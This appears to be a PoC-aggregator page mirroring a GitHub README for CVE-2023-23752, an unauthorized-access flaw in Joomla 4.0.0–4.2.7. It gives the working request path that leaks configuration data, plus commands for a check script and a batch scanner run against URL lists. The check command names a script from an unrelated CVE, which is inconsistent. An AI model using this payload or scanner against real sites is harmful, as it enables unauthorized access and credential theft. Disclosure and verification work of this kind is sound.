CVE-2023-23752 PoC — [20230201] - Core - Improper access check in webservice endpoints

Source

https://github.com/yTxZx/CVE-2023-23752

Associated Vulnerability

Title:[20230201] - Core - Improper access check in webservice endpoints (CVE-2023-23752)
Description:An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

Readme

CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability

# 脚本使用

安装python库

pip install -r requirements.txt

漏洞验证

python3 CVE-2022-26134_check.py -u url -c whoami

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/ef65c7d4-93c9-477d-86c1-f3e5d2daf288)


批量扫描

python3 CVE-2023-23752.py -f url_part.txt

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/e4125dc6-8590-4835-90ba-5c3d878dff3e)

# 影响版本

4.0.0 <= Joomla <= 4.2.7

# 漏洞复现

payload:

/api/index.php/v1/config/application?public=true

访问漏洞地址，抓包，重放数据包

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/6ee54b44-4de9-46a4-95e9-8357c6ca0aa4)

# 漏洞原理

Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当，可能导致未授权访问Rest API，造成敏感信息泄露

File Snapshot


 [4.0K]  /data/pocs/d8929767fee2b4f98473052d2c342917ef23a557
├── [5.2K]  CVE-2023-23752.py
├── [ 899]  README.md
└── [  60]  requirements.txt

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!